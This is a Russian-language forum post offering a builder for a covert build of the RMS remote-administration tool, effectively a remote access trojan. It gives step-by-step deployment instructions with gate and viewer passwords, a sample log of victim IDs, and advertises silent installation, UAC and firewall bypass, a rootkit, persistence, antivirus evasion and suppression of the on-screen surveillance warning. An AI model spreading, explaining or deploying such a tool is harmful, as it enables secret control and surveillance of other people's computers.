Ещё одна софтинка с форума хакерокеров.На работоспособность и чистоту не проверял.Отчёт с vt по предыдущей сборке (суббота)
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
При распаковке кстати НОД ругался лишь как на потенциально опасное ПО,а не как на троянчег.
Описание предыдущей версии +описание новых функций этой.
Совершенно новая сборка. Принцип тотальна отличается от всех известных паблику сборок. Никаких скриптов, батников и библиотек! Никаких SFX архивов! Ни каких левых .dll и прочей ерунды. Никаких лоадеров, сторонних веб сайтов и почт. Все максимально анонимно.
Инструкция по установке:
1. Залить все файлы с папки "php" на хостинг. Логин\пасс для входа в гейт: root;pass
2. Запустить "builder\builder.exe".
3. Указать в нем URL к папке до скриптов на хостинге. В конце / обязателен!
4. Нажать build, дождаться окончания сборки файлов, сохранить результат.
5. Сохраненный файл и будет являться скрытой сборкой РМС. Отправка ID приходит на гейт.
6. Запускаете Viewer, добавляете ID, подключаетесь. Пароль для подключения: 7707
Особенности:
+ Отправка ID на php гейт.
+ Криптуется! Да, да, это именно такая сборка которую можно криптовать.
+ Полностью скрытая установка.
+ Обходит UAC на максимальном уровне защиты. [WIN7 \ WIN8]
+ Обходит стандартный Брандмауэр. [WIN7 \ WIN8]
+ Работоспособность на всех ОС начиная с XP.
+ Скрыто окно видеонаблюдения.
+ Скрытие в файловой системе.
+ Ожидание соединения интернета, после чего отправка ID на гейт.
Дополнительные особенности платного билдера:
+ Самокопирование в систему с последующей работой в директории %TEMP%.
+ Два на выбор метода автозагрузки.
+ Присутствует RootKit.
+ Устойчивая автозагрузка.
+ Устойчивый процесс RMS.
+ Обходит популярные антивирусные проактивные анализы.
+ Есть возможность изменить описание процесса в автозагрузке.
+ Есть возможность переименовать название процесса.
+ Не палится популярными антивирусами.
Пример лога на гейте:
07.04.2015 16:32:55 : 633-458-692
07.04.2015 16:28:08 : 846-340-263
07.04.2015 16:27:04 : 897-229-573
07.04.2015 16:17:51 : 694-162-808
Новая версия
Что нового:
+ Добавлена полная поддержка юникода.
+ В бесплатную версию добавлена функция дропа в %TEMP%
+ Дописан модуль логики. Теперь работает стабильнее и быстрее.
+ Поправлен баг с работой из дериктории без самокопирования.
+ Сборка полностью переписана с Delphi 7 на Delphi 2009.
Что в будущем:
+ Отправка ID на почту.
+ Уменьшение веса.
Что в будущем у платной версии.
+ Оптимизация кода в плане руткита.
+ Автоматическая очистка rutserv от зависимости UAC.
+ Восстановление работоспособности видеонаблюдения.
+ Глобальный хук окна, и запрет на его появление. ("Внимание! Ведется видеонаблюдение!")
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
Пасс на архив:111